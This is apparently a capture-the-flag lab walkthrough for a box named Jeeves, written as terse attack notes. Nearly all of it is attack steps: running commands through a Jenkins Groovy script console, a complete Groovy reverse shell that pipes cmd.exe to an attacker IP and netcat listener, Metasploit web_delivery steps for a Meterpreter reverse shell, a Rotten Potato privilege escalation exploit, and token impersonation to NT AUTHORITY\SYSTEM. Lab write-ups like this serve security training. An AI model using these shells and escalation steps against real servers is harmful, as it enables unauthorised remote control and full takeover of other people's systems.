Jeeves Potato Attack

nmap -p-

println "cmd.exe /c syteminfo".execute().text

#Groovy Script Console

#Netcat

nc -nlvp 4444

#Paste in to console

String host="IP";

int port=4444;

String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

#MSFConsole

Create a Meterpreter shell

msfconsole

use exploit/multi/script/web_delivery

options

show targets

set target 2 (powershell)

set payload windows/meterpreter/reverse_tcp

set lhost 10.1.1.1

set srvhost 10.1.1.1

run

copy output and paste into cmd of none priv shell

#Meterpreter

getprivs

run post/multi/recon/local_exploit_suggester

background

use exploit/windows/local/ms16_75_reflection

set lhost set lport

set session #

set payload windows/meterpreter/reverse_tcp

load incognito

list _tokens -u

copy "NT AUTHORITY\SYSYEM"

impersonate_token "NT AUTHORITY\SYSYEM"

shell

whoami

dir /R

more < filename

PreviousBoxes NextAChat

Last updated 2 years ago